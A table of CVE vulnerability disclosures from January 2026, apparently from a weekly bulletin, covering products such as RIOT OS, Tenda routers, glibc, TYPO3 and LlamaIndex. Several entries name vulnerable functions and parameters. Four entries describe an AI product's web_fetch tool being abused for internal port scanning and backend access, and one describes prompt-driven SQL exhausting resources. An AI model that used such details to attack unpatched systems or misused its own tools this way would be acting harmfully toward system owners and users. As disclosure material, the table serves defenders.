| RIOT--RIOT OS | RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption. | 2026-01-12 | not yet calculated | CVE-2026-22213 | https://seclists.org/fulldisclosure/2026/Jan/15 https://www.riot-os.org/ https://github.com/RIOT-OS/RIOT https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-tapslip6-utility |
| RIOT--RIOT OS | RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the ethos utility due to missing bounds checking when processing incoming serial frame data. The vulnerability occurs in the _handle_char() function, where incoming frame bytes are appended to a fixed-size stack buffer without verifying that the current write index remains within bounds. An attacker capable of sending crafted serial or TCP-framed input can cause the current write index to exceed the buffer size, resulting in a write past the end of the stack buffer. This condition leads to memory corruption and application crash. | 2026-01-12 | not yet calculated | CVE-2026-22214 | https://seclists.org/fulldisclosure/2026/Jan/16 https://www.riot-os.org/ https://github.com/RIOT-OS/RIOT https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-ethos-serial-frame-parser |
| run-llama--llama_index | LlamaIndex (run-llama/llama_index) versions up to and including 0.11.6 contain an unsafe deserialization vulnerability in BGEM3Index.load_from_disk() in llama_index/indices/managed/bge_m3/base.py. The function uses pickle.load() to deserialize multi_embed_store.pkl from a user-supplied persist_dir without validation. An attacker who can provide a crafted persist directory containing a malicious pickle file can trigger arbitrary code execution when the victim loads the index from disk. | 2026-01-12 | not yet calculated | CVE-2024-14021 | https://huntr.com/bounties/ab4ceeb4-aa85-4d1c-aaca-4eda1b71fc12 https://www.llamaindex.ai/ https://github.com/run-llama/llama_index https://www.vulncheck.com/advisories/llamaindex-bgem3index-unsafe-deserialization |
| run-llama--llama_index | LlamaIndex (run-llama/llama_index) versions up to and including 0.12.2 contain an uncontrolled resource consumption vulnerability in the VannaPack VannaQueryEngine implementation. The custom_query() logic generates SQL statements from a user-supplied prompt and executes them via vn.run_sql() without enforcing query execution limits In downstream deployments where untrusted users can supply prompts, an attacker can trigger expensive or unbounded SQL operations that exhaust CPU or memory resources, resulting in a denial-of-service condition. The vulnerable execution path occurs in llama_index/packs/vanna/base.py within custom_query(). | 2026-01-12 | not yet calculated | CVE-2024-58339 | https://huntr.com/bounties/a1d6c30d-fce0-412a-bd22-14e0d4c1fa1f https://www.llamaindex.ai/ https://github.com/run-llama/llama_index https://www.vulncheck.com/advisories/llamaindex-vannaqueryengine-sql-execution-allows-resource-exhaustion |
| RustCrypto--utils | RustCrypto CMOV provides conditional move CPU intrinsics which are guaranteed on major platforms to execute in constant-time and not be rewritten as branches by the compiler. Prior to 0.4.4, the thumbv6m-none-eabi (Cortex M0, M0+ and M1) compiler emits non-constant time assembly when using cmovnz (portable version). This vulnerability is fixed in 0.4.4. | 2026-01-15 | not yet calculated | CVE-2026-23519 | https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp https://github.com/RustCrypto/utils/commit/55977257e7c82a309d5e8abfdd380a774f0f9778 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. From >= 1.0.0-alpha.1 to 1.0.0-alpha.79, invalid RPC signatures cause the server to log the shared HMAC secret (and expected signature), which exposes the secret to log readers and enables forged RPC calls. In crates/ecstore/src/rpc/http_auth.rs, the invalid signature branch logs sensitive data. This log line includes secret and expected_signature, both derived from the shared HMAC key. Any invalidly signed request triggers this path. The function is reachable from RPC and admin request handlers. This vulnerability is fixed in 1.0.0-alpha.80. | 2026-01-16 | not yet calculated | CVE-2026-22782 | https://github.com/rustfs/rustfs/security/advisories/GHSA-333v-68xh-8mmq https://github.com/rustfs/rustfs/commit/6b2eebee1d07399ef02c0863bd515b4412a5a560 https://github.com/rustfs/rustfs/blob/9e162b6e9ebb874cc1d06a7b33bc4a05786578aa/crates/ecstore/src/rpc/http_auth.rs#L115-L122 |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses PKCS1Encoding which is vulnerable to Bleichenbacher padding oracle attacks. Modern systems should use OAEP (Optimal Asymmetric Encryption Padding). This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68698 | https://github.com/samrocketman/jervis/security/advisories/GHSA-mqw7-c5gg-xq97 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses deterministic AES IV derivation from a passphrase. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68701 | https://github.com/samrocketman/jervis/security/advisories/GHSA-crxp-chh4-9ghp https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses padLeft(32, '0') when it should use padLeft(64, '0') because SHA-256 produces 32 bytes which equates to 64 hex characters. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68702 | https://github.com/samrocketman/jervis/security/advisories/GHSA-67rj-pjg6-pq59 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, the salt is derived from sha256Sum(passphrase). Two encryption operations with the same password will have the same derived key. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68703 | https://github.com/samrocketman/jervis/security/advisories/GHSA-36h5-vrq6-pp34 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses java.util.Random() which is not cryptographically secure for timing attack mitigation. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68704 | https://github.com/samrocketman/jervis/security/advisories/GHSA-c9q6-g3hr-8gww https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, the code doesn't validate that the JWT header specifies "alg":"RS256". This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68925 | https://github.com/samrocketman/jervis/security/advisories/GHSA-5pq9-5mpr-jj85 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, AES/CBC/PKCS5Padding lacks authentication, making it vulnerable to padding oracle attacks and ciphertext manipulation. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68931 | https://github.com/samrocketman/jervis/security/advisories/GHSA-gxp5-mv27-vjcj https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| Schneider Electric--EcoStruxure Power Build Rapsody | CWE-415: Double Free vulnerability exists that could cause heap memory corruption when the end user imports a malicious project file (SSD file) shared by the attacker into Rapsody. | 2026-01-15 | not yet calculated | CVE-2025-13844 | https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-04&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-013-04.pdf |
| Schneider Electric--EcoStruxure Power Build Rapsody | CWE-416: Use After Free vulnerability that could cause remote code execution when the end user imports the malicious project file (SSD file) into Rapsody. | 2026-01-15 | not yet calculated | CVE-2025-13845 | https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-04&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-013-04.pdf |
| Semantic--Semantic | An issue in Semantic machines v5.4.8 allows attackers to bypass authentication via sending a crafted HTTP request to various API endpoints. | 2026-01-13 | not yet calculated | CVE-2025-66698 | http://veda.com http://semantic.com https://github.com/Perunchess/CVE-2025-66698 |
| ServiceNow--Now Assist AI Agents | A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform. ServiceNow has addressed this vulnerability by deploying a relevant security update to hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so. | 2026-01-12 | not yet calculated | CVE-2025-12420 | https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB2587329 |
| siyuan-note--siyuan | SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2. | 2026-01-16 | not yet calculated | CVE-2026-23645 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pcjq-j3mq-jv5j https://github.com/siyuan-note/siyuan/issues/16844 https://github.com/siyuan-note/siyuan/commit/11115da3d0de950593ee4ce375cf7f9018484388 |
| Slab--Quill | A lack of data validation vulnerability in the HTML export feature in Quill in allows Cross-Site Scripting (XSS). This issue affects Quill: 2.0.3. | 2026-01-13 | not yet calculated | CVE-2025-15056 | https://fluidattacks.com/advisories/diomedes https://github.com/slab/quill |
| Sonatype--Nexus Repository | Server-Side Request Forgery (SSRF) vulnerability in Sonatype Nexus Repository 3 versions 3.0.0 and later allows authenticated administrators to configure proxy repositories with URLs that can access unintended network destinations, potentially including cloud metadata services and internal network resources. A workaround configuration is available starting in version 3.88.0, but the product remains vulnerable by default. | 2026-01-14 | not yet calculated | CVE-2026-0600 | https://support.sonatype.com/hc/en-us/articles/47928855816595 |
| Sonatype--Nexus Repository | A reflected cross-site scripting vulnerability exists in Nexus Repository 3 that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted request requiring user interaction. | 2026-01-14 | not yet calculated | CVE-2026-0601 | https://help.sonatype.com/en/sonatype-nexus-repository-3-88-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/47934334375955 |
| Sourcecodester--Sourcecodester | Sourcecodester Covid-19 Contact Tracing System 1.0 is vulnerable to RCE (Remote Code Execution). The application receives a reverse shell (php) into imagem of the user enabling RCE. | 2026-01-12 | not yet calculated | CVE-2025-66802 | https://feedly.com/cve/CVE-2022-2746 https://github.com/mtgsjr/CVE-2025-66802 |
| SparkyFitness--SparkyFitness | SparkyFitness v0.15.8.2 is vulnerable to Cross Site Scripting (XSS) via user input and LLM output. | 2026-01-15 | not yet calculated | CVE-2025-65368 | https://github.com/CodeWithCJ/SparkyFitness https://github.com/CodeWithCJ/SparkyFitness/security/advisories/GHSA-j7x6-6678-2xqp#event-521570 |
| Stackideas.com--EasyDiscuss extension for Joomla | Lack of input filterung leads to a persistent XSS vulnerability in the forum post handling of the Easy Discuss component for Joomla. | 2026-01-16 | not yet calculated | CVE-2026-21623 | https://stackideas.com/easydiscuss |
| Stackideas.com--EasyDiscuss extension for Joomla | Lack of input filterung leads to a persistent XSS vulnerability in the user avatar text handling of the Easy Discuss component for Joomla. | 2026-01-16 | not yet calculated | CVE-2026-21624 | https://stackideas.com/easydiscuss |
| Stackideas.com--EasyDiscuss extension for Joomla | User provided uploads to the Easy Discuss component for Joomla aren't properly validated. Uploads are purely checked by file extensions, no mime type checks are happening. | 2026-01-16 | not yet calculated | CVE-2026-21625 | https://stackideas.com/easydiscuss |
| SteelSeries--SteelSeries | SteelSeries Nahimic 3 1.10.7 allows Directory traversal. | 2026-01-16 | not yet calculated | CVE-2025-68921 | https://steelseries.gg https://steelseries.com/nahimic https://gist.github.com/ZeroMemoryEx/93208b7e57a5444de3654816857ddef4 |
| Steven--Uploadify | Uploadify WordPress plugin versions up to and including 1.0 contain an arbitrary file upload vulnerability in process_upload.php due to missing file type validation. An unauthenticated remote attacker can upload arbitrary files to the affected WordPress site, which may allow remote code execution by uploading executable content to a web-accessible location. | 2026-01-15 | not yet calculated | CVE-2011-10041 | https://packetstorm.news/files/id/98652 https://wpscan.com/vulnerability/6946364c-9764-468e-87d5-2dd57e531985/ https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uploadify/uploadify-10-arbitrary-file-upload https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-uploadify-remote-file-upload-1-0/ https://www.vulncheck.com/advisories/uploadify-unauthenticated-arbitrary-file-upload |
| Svelte--Svelte | An SSR XSS exists in async hydration when attacker‑controlled keys are passed to hydratable. The key is embedded inside a <script> block without HTML‑safe escaping, allowing </script> to terminate the script and inject arbitrary JavaScript. This enables remote script execution in users' browsers, with potential for session theft and account compromise. This issue affects Svelte: from 5.46.0 before 5.46.3. | 2026-01-15 | not yet calculated | CVE-2025-15265 | https://fluidattacks.com/advisories/lydian https://github.com/sveltejs/svelte/security/advisories/GHSA-6738-r8g5-qwp3 https://fluidattacks.com/advisories/lydian |
| sveltejs--kit | SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.49.5, SvelteKit is vulnerable to a server side request forgery (SSRF) and denial of service (DoS) under certain conditions. From 2.44.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route (export const prerender = true). From 2.19.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route and you are using adapter-node without a configured ORIGIN environment variable, and you are not using a reverse proxy that implements Host header validation. This vulnerability is fixed in 2.49.5. | 2026-01-15 | not yet calculated | CVE-2025-67647 | https://github.com/sveltejs/kit/security/advisories/GHSA-j62c-4x62-9r35 https://github.com/sveltejs/kit/commit/d9ae9b00b14f5574d109f3fd548f960594346226 |
| sveltejs--kit | SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. From 2.49.0 to 2.49.4, the experimental form remote function uses a binary data format containing a representation of submitted form data. A specially-crafted payload can cause the server to allocate a large amount of memory, causing DoS via memory exhaustion. This vulnerability is fixed in 2.49.5. | 2026-01-15 | not yet calculated | CVE-2026-22803 | https://github.com/sveltejs/kit/security/advisories/GHSA-j2f3-wq62-6q46 https://github.com/sveltejs/kit/commit/8ed8155215b9a74012fecffb942ad9a793b274e5 https://github.com/sveltejs/kit/releases/tag/@sveltejs%2Fadapter-node@5.5.1 |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the mac parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-15 | not yet calculated | CVE-2025-70656 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/11/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the cloneType parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-15 | not yet calculated | CVE-2025-70744 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/10/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the timeZone parameter of the fromSetSysTime function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-16 | not yet calculated | CVE-2025-70746 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/4/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the serviceName parameter of the sub_65A28 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-14 | not yet calculated | CVE-2025-70747 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/6/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the security_5g parameter of the sub_4CA50 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-70753 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/8/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the wanSpeed parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-15 | not yet calculated | CVE-2025-71019 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/9/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the security parameter of the sub_4C408 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-16 | not yet calculated | CVE-2025-71020 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/5/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the serverName parameter of the sub_65A28 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-14 | not yet calculated | CVE-2025-71021 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/7/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the mac2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71023 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/11/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the serviceName2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71024 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/12/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the cloneType2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71025 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/10/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the wanSpeed2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71026 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/9/1.md |
| Tenda--Tenda | Tenda AX-3 v16.03.12.10_CN was discovered to contain a stack overflow in the wanMTU2 parameter of the fromAdvSetMacMtuWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-13 | not yet calculated | CVE-2025-71027 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-3/8/1.md |
| The GNU C Library--glibc | Passing too large an alignment to the memalign suite of functions (memalign, posix_memalign, aligned_alloc) in the GNU C Library version 2.30 to 2.42 may result in an integer overflow, which could consequently result in a heap corruption. Note that the attacker must have control over both, the size as well as the alignment arguments of the memalign function to be able to exploit this. The size parameter must be close enough to PTRDIFF_MAX so as to overflow size_t along with the large alignment argument. This limits the malicious inputs for the alignment for memalign to the range [1<<62+ 1, 1<<63] and exactly 1<<63 for posix_memalign and aligned_alloc. Typically the alignment argument passed to such functions is a known constrained quantity (e.g. page size, block size, struct sizes) and is not attacker controlled, because of which this may not be easily exploitable in practice. An application bug could potentially result in the input alignment being too large, e.g. due to a different buffer overflow or integer overflow in the application or its dependent libraries, but that is again an uncommon usage pattern given typical sources of alignments. | 2026-01-14 | not yet calculated | CVE-2026-0861 | https://sourceware.org/bugzilla/show_bug.cgi?id=33796 https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0001 |
| The GNU C Library--glibc | Calling getnetbyaddr or getnetbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend for networks and queries for a zero-valued network in the GNU C Library version 2.0 to version 2.42 can leak stack contents to the configured DNS resolver. | 2026-01-15 | not yet calculated | CVE-2026-0915 | https://sourceware.org/bugzilla/show_bug.cgi?id=33802 |
| The Nu Html Checker--The Nu Html Checker | Nu Html Checker (validator.nu) contains a restriction bypass that allows remote attackers to make the server perform arbitrary HTTP/HTTPS requests to internal resources, including localhost services. While the validator implements hostname-based protections to block direct access to localhost and 127.0.0.1, these controls can be bypassed using DNS rebinding techniques or domains that resolve to loopback addresses.This issue affects The Nu Html Checker (vnu): latest (commit 23f090a11bab8d0d4e698f1ffc197a4fe226a9cd). | 2026-01-16 | not yet calculated | CVE-2025-15104 | https://fluidattacks.com/advisories/europe https://github.com/validator/validator |
| TheLibrarian--TheLibrarian.io | The Librarian contains a information leakage vulnerability through the `web_fetch` tool, which can be used to retrieve arbitrary external content provided by an attacker, which can be used to proxy requests through The Librarian infrastructure. The vendor has fixed the vulnerability in all versions of TheLibrarian. | 2026-01-16 | not yet calculated | CVE-2026-0612 | http://mindgard.ai/blog/thelibrarian-ios-ai-security- https://thelibrarian.io/ |
| TheLibrarian--TheLibrarian.io | The Librarian contains an internal port scanning vulnerability, facilitated by the `web_fetch` tool, which can be used with SSRF-style behavior to perform GET requests to internal IP addresses and services, enabling scanning of the Hertzner cloud environment that TheLibrarian uses. The vendor has fixed the vulnerability in all affected versions. | 2026-01-16 | not yet calculated | CVE-2026-0613 | https://mindgard.ai/blog/thelibrarian-ios-ai-security-disclosure https://thelibrarian.io/ |
| TheLibrarian--TheLibrarian.io | The Librarian `supervisord` status page can be retrieved by the `web_fetch` tool, which can be used to retrieve running processes within TheLibrarian backend. The vendor has fixed the vulnerability in all affected versions. | 2026-01-16 | not yet calculated | CVE-2026-0615 | http://mindgard.ai/blog/thelibrarian-ios-ai-security- https://thelibrarian.io/ |
| TheLibrarian--TheLibrarian.io | TheLibrarians web_fetch tool can be used to retrieve the Adminer interface content, which can then be used to log into the internal TheLibrarian backend system. The vendor has fixed the vulnerability in all affected versions. | 2026-01-16 | not yet calculated | CVE-2026-0616 | https://mindgard.ai/blog/thelibrarian-ios-ai-security-disclosure https://thelibrarian.io/ |
| TinyOS--TinyOS | TinyOS versions up to and including 2.1.2 contain a global buffer overflow vulnerability in the printfUART formatted output implementation used within the ZigBee / IEEE 802.15.4 networking stack. The implementation formats output into a fixed-size global buffer and concatenates strings for %s format specifiers using strcat() without verifying remaining buffer capacity. When printfUART is invoked with a caller-controlled string longer than the available space, the unbounded sprintf/strcat sequence writes past the end of debugbuf, resulting in global memory corruption. This can cause denial of service, unintended behavior, or information disclosure via corrupted adjacent global state or UART output. | 2026-01-14 | not yet calculated | CVE-2026-22211 | https://seclists.org/fulldisclosure/2026/Jan/14 https://github.com/tinyos/tinyos-main https://www.vulncheck.com/advisories/tinyos-global-buffer-overflow-in-printfuart |
| TinyOS--TinyOS | TinyOS versions up to and including 2.1.2 contain a stack-based buffer overflow vulnerability in the mcp2200gpio utility. The vulnerability is caused by unsafe use of strcpy() and strcat() functions when constructing device paths during automatic device discovery. A local attacker can exploit this by creating specially crafted filenames under /dev/usb/, leading to stack memory corruption and application crashes. | 2026-01-12 | not yet calculated | CVE-2026-22212 | https://seclists.org/fulldisclosure/2026/Jan/14 https://github.com/tinyos/tinyos-main https://www.vulncheck.com/advisories/tinyos-stack-based-buffer-overflow-in-mcp2200gpio |
| TOA Corporation--Multiple Network Cameras TRIFORA 3 series | OS Command Injection vulnerability exists in multiple Network Cameras TRIFORA 3 series provided by TOA Corporation, which may allow a logged-in user with the low("monitoring user") or higher privilege to execute an arbitrary OS command. | 2026-01-16 | not yet calculated | CVE-2026-20759 | https://www.toa-products.com/securityinfo/pdf/tv2025-001jp.pdf https://jvn.jp/en/jp/JVN08087148/ |
| TOA Corporation--Multiple Network Cameras TRIFORA 3 series | Cross-site scripting vulnerability exists in multiple Network Cameras TRIFORA 3 series provided by TOA Corporation. If an attacking administrator configures the affected product with some malicious input, an arbitrary script may be executed on the web browser of a victim administrator who accesses the setting screen. | 2026-01-16 | not yet calculated | CVE-2026-20894 | https://www.toa-products.com/securityinfo/pdf/tv2025-001jp.pdf https://jvn.jp/en/jp/JVN08087148/ |
| TOA Corporation--Multiple Network Cameras TRIFORA 3 series | Path Traversal vulnerability exists in multiple Network Cameras TRIFORA 3 series provided by TOA Corporation. If this vulnerability is exploited, arbitrary files on the affected product may be retrieved by a logged-in user with the low("monitoring user") or higher privilege. | 2026-01-16 | not yet calculated | CVE-2026-22876 | https://www.toa-products.com/securityinfo/pdf/tv2025-001jp.pdf https://jvn.jp/en/jp/JVN08087148/ |
| Tongyu--Tongyu | An authentication bypass vulnerability in the Tongyu AX1800 Wi-Fi 6 Router with firmware 1.0.0 allows unauthenticated network-adjacent attackers to perform arbitrary configuration changes without providing credentials, as long as a valid admin session is active. This can result in full compromise of the device (i.e., via unauthenticated access to /boaform/formSaveConfig and /boaform/admin endpoints). | 2026-01-13 | not yet calculated | CVE-2025-68707 | https://www.tongyucom.com/product/ax1800.html https://github.com/actuator/cve/tree/main/Tongyu https://github.com/actuator/cve/blob/main/Tongyu/CVE-2025-68707.txt |
| TP-Link Systems Inc.--TL-WR841N v14 | A Null Pointer Dereference vulnerability exists in the referer header check of the web portal of TP-Link TL-WR841N v14, caused by improper input validation. A remote, unauthenticated attacker can exploit this flaw and cause Denial of Service on the web portal service.This issue affects TL-WR841N v14: before 250908. | 2026-01-15 | not yet calculated | CVE-2025-9014 | https://www.tp-link.com/us/support/faq/4894/ https://www.tp-link.com/jp/support/download/tl-wr841n/#Firmware https://www.tp-link.com/en/support/download/tl-wr841n/#Firmware https://www.tp-link.com/us/support/download/tl-wr841n/#Firmware |
| TP-Link Systems Inc.--VIGI InSight Sx45 Series (S245/S345/S445) | Authentication bypass in the password recovery feature of the local web interface across multiple VIGI camera models allows an attacker on the LAN to reset the admin password without verification by manipulating client-side state. Attackers can gain full administrative access to the device, compromising configuration and network security. | 2026-01-16 | not yet calculated | CVE-2026-0629 | https://www.vigi.com/us/support/download/ https://www.vigi.com/en/support/download/ https://www.vigi.com/in/support/download/ https://www.tp-link.com/us/support/faq/4899/ |
| Typesetter--Typesetter | Typesetter CMS versions up to and including 5.1 contain a reflected cross-site scripting (XSS) vulnerability in the Editing component. The images parameter (submitted as images[] in a POST request) is reflected into an HTML href attribute without proper context-aware output encoding in include/tool/Editing.php. An authenticated attacker with editing privileges can supply a JavaScript pseudo-protocol (e.g., javascript:) to trigger arbitrary JavaScript execution in the context of the victim's browser session. | 2026-01-14 | not yet calculated | CVE-2025-71164 | https://github.com/Typesetter/Typesetter https://github.com/Typesetter/Typesetter/issues/706 https://www.vulncheck.com/advisories/typesetter-cms-reflected-xss-via-editing-php |
| Typesetter--Typesetter | Typesetter CMS versions up to and including 5.1 contain a reflected cross-site scripting (XSS) vulnerability in the administrative interface within the Tools Status functionality. The path parameter is reflected into the HTML response without proper output encoding in include/admin/Tools/Status.php. An authenticated attacker can supply crafted input containing HTML or JavaScript, resulting in arbitrary script execution in the context of an authenticated user's browser session. | 2026-01-14 | not yet calculated | CVE-2025-71165 | https://github.com/Typesetter/Typesetter https://github.com/Typesetter/Typesetter/issues/709 https://www.vulncheck.com/advisories/typesetter-cms-reflected-xss-via-status-php |
| Typesetter--Typesetter | Typesetter CMS versions up to and including 5.1 contain a reflected cross-site scripting (XSS) vulnerability in the administrative interface within the Tools Status move message handling. The path parameter is reflected into the HTML output without proper output encoding in include/admin/Tools/Status.php. An authenticated attacker can supply crafted input containing HTML or JavaScript, resulting in arbitrary script execution in the context of an authenticated user's browser session. | 2026-01-14 | not yet calculated | CVE-2025-71166 | https://github.com/Typesetter/Typesetter https://github.com/Typesetter/Typesetter/issues/707 https://www.vulncheck.com/advisories/typesetter-cms-reflected-xss-via-move-message-handling |
| TYPO3--TYPO3 CMS | By exploiting the defVals parameter, attackers could bypass field‑level access checks during record creation in the TYPO3 backend. This gave them the ability to insert arbitrary data into prohibited exclude fields of a database table for which the user already has write permission for a reduced set of fields. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2025-59020 | https://typo3.org/security/advisory/typo3-core-sa-2026-001 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| TYPO3--TYPO3 CMS | Backend users with access to the redirects module and write permission on the sys_redirect table were able to read, create, and modify any redirect record without restriction to the user's own file-mounts or web-mounts. This allowed attackers to insert or alter redirects pointing to arbitrary URLs - facilitating phishing or other malicious redirect attacks. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2025-59021 | https://typo3.org/security/advisory/typo3-core-sa-2026-002 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| TYPO3--TYPO3 CMS | Backend users who had access to the recycler module could delete arbitrary data from any database table defined in the TCA - regardless of whether they had permission to that particular table. This allowed attackers to purge and destroy critical site data, effectively rendering the website unavailable. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2025-59022 | https://typo3.org/security/advisory/typo3-core-sa-2026-003 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
